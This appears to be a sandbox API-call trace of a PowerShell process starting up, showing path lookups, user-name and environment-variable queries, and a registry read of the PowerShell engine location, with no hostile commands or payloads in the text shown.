	[0418.436] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0418.437] SetErrorMode (uMode=0x1) returned 0x1
	[0418.437] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.437] SetErrorMode (uMode=0x1) returned 0x1
	[0418.437] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0418.437] SetErrorMode (uMode=0x1) returned 0x1
	[0418.437] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.437] SetErrorMode (uMode=0x1) returned 0x1
	[0418.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.438] SetErrorMode (uMode=0x1) returned 0x1
	[0418.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.438] SetErrorMode (uMode=0x1) returned 0x1
	[0418.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.438] SetErrorMode (uMode=0x1) returned 0x1
	[0418.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.440] SetErrorMode (uMode=0x1) returned 0x1
	[0418.440] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d5b0 | out: lpFileInformation=0x20d5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.441] SetErrorMode (uMode=0x1) returned 0x1
	[0418.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.805] CoTaskMemAlloc (cb=0x804) returned 0x1b8ceba0
	[0418.805] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ceba0, nSize=0x20d918 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d918) returned 0x1
	[0418.805] CoTaskMemFree (pv=0x1b8ceba0) 
	[0418.805] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0418.805] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d958 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d958) returned 1
	[0418.806] CoTaskMemFree (pv=0x2ec760) 
	[0418.808] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eba7f0*="Available", lpRawData=0x2eba580) returned 1
	[0419.451] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0419.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.451] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0419.452] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0419.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.453] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0419.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.460] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0419.460] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0419.460] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0419.460] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0419.460] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0419.460] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0419.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.462] GetCurrentProcessId () returned 0x9ec
	[0419.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.467] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d938 | out: phkResult=0x20d938*=0x388) returned 0x0
	[0419.467] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d8bc, lpData=0x0, lpcbData=0x20d8b8*=0x0 | out: lpType=0x20d8bc*=0x1, lpData=0x0, lpcbData=0x20d8b8*=0x56) returned 0x0
	[0419.467] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a7040
	[0419.467] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d88c, lpData=0x1b8a7040, lpcbData=0x20d888*=0x56 | out: lpType=0x20d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d888*=0x56) returned 0x0
	[0419.467] CoTaskMemFree (pv=0x1b8a7040) 
	[0419.467] RegCloseKey (hKey=0x388) returned 0x0
	[0419.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.470] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0419.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.470] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0419.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
